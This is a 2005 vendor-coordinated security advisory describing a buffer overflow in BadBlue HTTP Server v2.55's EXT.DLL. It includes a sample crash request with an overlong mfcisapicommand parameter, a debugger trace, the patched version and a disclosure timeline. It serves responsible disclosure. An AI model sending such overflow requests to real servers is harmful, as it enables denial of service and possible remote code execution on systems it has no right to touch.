SIA International Security Advisory - Badblue HTTP Server, ext.dll buffer
overflow

* Release DAte:
February 26, 2005

* Vendor:  
Working Resources Inc. http://www.badblue.com

* Versions Affected:
Confirmed under Badblue HTTP Server v2.55

* Severity: 
Critical  (Remote Code execution)

* Summary:
"BadBlue is not only a server, it's a complete file sharing system that is
simply easier and faster to use than anything else. Why? Because BadBlue
lets you use a tool you already know well: a web browser."
"In seconds, you can turn your PC into a powerful web server. You can easily
share photos, music, videos, and much more. With its simple menu-driven
interface and pop-up wizards to guide you through setup, there's no faster
way to share files"


* Technical Details:
SIA has discovered a buffer overflow in EXT.DLL, a module that handles
badblue http Requests. This buffer overflow triggers when an special crafted
HTTP Request is created.
Buffer overflow in EXT.DLL is triggered when a malicious http request that
contains a long mfcisapicommand  parameter, with more than 250 chars, is
submitted. Some registers are overwritten so its possible to execute code or
cause a denial of service shutting down the server. The Following request
can be used to crash the remote server.

GET /ext.dll?mfcisapicommand=AAA...[250 chars]...AAA&page=index.htx

Windbg trace:
(360.21c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=026bda14 ebx=01130478 ecx=41414141 edx=0113057d esi=41414141
edi=77e2b495
eip=10042004 esp=026bd8f4 ebp=026bdbe0 iopl=0         nv up ei pl nz na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
efl=00010206
*** WARNING: Unable to verify checksum for E:\BadBlue\PE\ext.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
E:\BadBlue\PE\ext.dll - 
ext!GetExtensionVersion+0x13f7:
10042004 8b3e             mov     edi,[esi]
ds:0023:41414141=????????

Succesfully exploitation of this flaw could allow remote code execution with
Administrator rigths.


* Solution: 
Upgrade to the lastest available version. At this time, vendor provides
version v2.6 that is available to download at
http://www.badblue.com/bb98.exe

* Credits:
Andres Tarasco (atarasco _at_ sia.es) has discovered this vulnerability

* Disclosure Timeline:
December     2004 - Discovered
December 20, 2004 -  Initial Vendor Notification 
December 21, 2004 -  Initial Vender Response
January 3,   2005 -  Vendor Patch released (v2.60)
February 26,  2005 -  Public Disclosure